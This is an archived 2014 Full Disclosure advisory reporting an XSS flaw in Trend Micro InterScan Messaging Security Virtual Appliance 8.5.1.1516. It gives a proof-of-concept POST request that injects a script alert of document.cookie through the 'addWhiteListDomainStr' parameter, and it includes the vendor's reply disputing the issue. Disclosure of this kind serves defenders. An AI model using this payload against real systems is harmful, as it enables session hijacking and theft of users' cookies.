| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 29 May 2014 12:55:03 -0300 From: William Costa <william.costa@...il.com> To: fulldisclosure@...lists.org Subject: [FD] XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance 8.5.1.1516 (Zero-DAY) I. VULNERABILITY ------------------------- XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance 8.5.1.1516 II. DESCRIPTION ------------------------- Has been detected a XSS vulnerability in InterScan Messaging Security Virtual Appliance version 8.5.1.1516. The code injection is done through the parameter "addWhiteListDomainStr" send via post in the page “/addWhiteListDomain.imss” III. PROOF OF CONCEPT ------------------------- The application does not validate the parameter “addWhiteListDomainStr” correctly. https://10.200.210.100:8445/addWhiteListDomain.imss Host=10.200.210.100:8445 User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0 Accept=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Referer= https://186.230.33.160/trend-interscan/trend.php Cookie=JSESSIONID=68D4F0AEF4874173BDE77FAA4895231F; CurrentLocale=en- US; PHPSESSID=2ok068gfak8np5isbe5k5l4nf3; un=7164ceee6266e893181da6c33936e4a4; userID=1; LANG=en; wids=modImsvaSystemUseageWidget,modImsvaMailsQueueWidget,modImsvaQuara ntineWidget,modImsvaArchiveWidget,; lastID=15; theme=default; lastTab=1; GetPageTab=1 Connection=keep-alive Content-Type=application/x-www-form-urlencoded Content-Length=95 POSTDATA=addWhiteListDomainStr=aaaa.com"><script>alert(document.cookie );</script>) https://vimeo.com/96757096 IV. BUSINESS IMPACT ------------------------- An attacker can execute arbitrary HTML or script code in a targeted user's browser, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser allowing session hijacking. V. SYSTEMS AFFECTED ------------------------- Tested in InterScan Messaging Security Virtual Appliance 8.5.1.1516 VI. SOLUTION ------------------------ Answer from Trend. Hi William, According to our Product Developers, this is not vulnerability of our product. All of the cookies(not just IMSVA) can be stolen from a compromised environment. It was highly suggested that you upgrade your client to ensure safety. Also, they recommended another Trend Micro Product -"OfficeScan" that may be suitable for your environment. I hope this information helps. Please let me know if you have additional questions or clarifications. Have a great day! By William Costa _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists